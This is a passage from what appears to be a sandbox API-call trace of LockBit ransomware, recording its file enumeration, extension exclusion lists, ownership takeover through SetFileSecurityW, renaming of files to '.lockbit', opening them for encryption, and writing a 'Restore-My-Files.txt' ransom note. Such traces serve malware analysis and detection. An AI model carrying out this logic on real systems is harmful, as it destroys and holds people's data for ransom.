(lpString1=".hlp", lpString2=".mui") returned -1 [0078.194] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0078.195] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0078.195] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0078.195] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0078.195] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0078.195] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0078.195] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0078.195] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0078.195] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0078.195] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0078.195] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="InkObj.dll.mui") returned 1 [0078.196] lstrcmpiW (lpString1="ntldr", lpString2="InkObj.dll.mui") returned 1 [0078.196] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="InkObj.dll.mui") returned 1 [0078.196] lstrcmpiW (lpString1="bootsect.bak", lpString2="InkObj.dll.mui") returned -1 [0078.196] lstrcmpiW (lpString1="autorun.inf", lpString2="InkObj.dll.mui") returned -1 [0078.196] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0078.196] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned=".mui" [0078.196] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0078.196] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0078.196] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0078.196] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0078.197] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0078.197] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0078.197] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0078.197] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0078.197] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0078.197] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0078.197] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0078.197] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0078.197] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0078.197] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0078.197] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0078.197] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0078.197] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0078.197] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui.lockbit") returned 80 [0078.197] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.197] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui.lockbit")) returned 0 [0078.198] GetLastError () returned 0x5 [0078.198] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0078.198] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0078.198] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0078.198] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0078.199] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0078.199] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0078.199] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0078.199] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0078.216] NtClose (Handle=0x3b0) returned 0x0 [0078.216] RtlFreeAnsiString (AnsiString="\\") [0078.216] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b0) returned 1 [0078.216] malloc (_Size=0x200) returned 0x53fcc0 [0078.216] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0078.216] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.216] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.216] CloseHandle (hObject=0x3b0) returned 1 [0078.217] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0078.217] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0078.218] free (_Block=0x53fcc0) [0078.223] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.223] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui.lockbit")) returned 1 [0078.224] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0078.224] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0078.224] malloc (_Size=0x40068) returned 0x3940048 [0078.224] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=4608) returned 1 [0078.224] ReadFile (in: hFile=0x3b0, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0078.227] GetLastError () returned 0x3e5 [0078.227] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0078.228] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0078.228] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0078.228] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="InkWatson.exe.mui", cAlternateFileName="")) returned 1 [0078.228] lstrcmpiW (lpString1=".", lpString2="InkWatson.exe.mui") returned -1 [0078.228] lstrcmpiW (lpString1="..", lpString2="InkWatson.exe.mui") returned -1 [0078.228] PathFindExtensionW (pszPath="InkWatson.exe.mui") returned=".mui" [0078.228] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0078.228] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0078.228] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0078.228] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0078.228] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0078.228] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0078.229] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0078.229] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0078.229] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0078.229] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0078.229] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0078.229] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0078.229] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0078.229] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0078.230] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0078.230] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0078.230] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0078.230] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0078.230] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0078.230] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0078.230] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0078.230] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0078.230] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0078.230] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0078.230] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0078.230] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0078.230] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.230] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0078.230] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0078.230] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0078.230] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0078.230] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="InkWatson.exe.mui") returned 1 [0078.230] lstrcmpiW (lpString1="ntldr", lpString2="InkWatson.exe.mui") returned 1 [0078.230] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="InkWatson.exe.mui") returned 1 [0078.230] lstrcmpiW (lpString1="bootsect.bak", lpString2="InkWatson.exe.mui") returned -1 [0078.230] lstrcmpiW (lpString1="autorun.inf", lpString2="InkWatson.exe.mui") returned -1 [0078.230] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0078.231] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned=".mui" [0078.231] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0078.231] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0078.231] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0078.231] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0078.231] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0078.231] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0078.231] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0078.231] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0078.232] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0078.232] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0078.232] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0078.232] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0078.232] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0078.232] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0078.232] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui.lockbit") returned 83 [0078.232] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.232] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui.lockbit")) returned 0 [0078.237] GetLastError () returned 0x5 [0078.237] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0078.237] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0078.237] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0078.238] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0078.238] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0078.238] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0078.239] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0078.239] NtQueryInformationFile (in: FileHandle=0x3b4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0078.249] NtClose (Handle=0x3b4) returned 0x0 [0078.249] RtlFreeAnsiString (AnsiString="\\") [0078.249] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b4) returned 1 [0078.249] malloc (_Size=0x200) returned 0x53fcc0 [0078.250] GetTokenInformation (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0078.250] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.250] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.250] CloseHandle (hObject=0x3b4) returned 1 [0078.250] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0078.250] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0078.251] free (_Block=0x53fcc0) [0078.251] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.251] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui.lockbit")) returned 1 [0078.252] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0078.252] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0078.252] malloc (_Size=0x40068) returned 0x20abae0 [0078.254] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=9216) returned 1 [0078.254] ReadFile (in: hFile=0x3b4, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0078.259] GetLastError () returned 0x3e5 [0078.259] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0078.259] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0078.259] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0078.260] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="InputPersonalization.exe.mui", cAlternateFileName="")) returned 1 [0078.260] lstrcmpiW (lpString1=".", lpString2="InputPersonalization.exe.mui") returned -1 [0078.260] lstrcmpiW (lpString1="..", lpString2="InputPersonalization.exe.mui") returned -1 [0078.260] PathFindExtensionW (pszPath="InputPersonalization.exe.mui") returned=".mui" [0078.260] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0078.260] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0078.260] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0078.260] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0078.260] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0078.261] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0078.261] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0078.261] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0078.261] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0078.261] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0078.261] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0078.261] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0078.261] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0078.261] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0078.261] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0078.262] 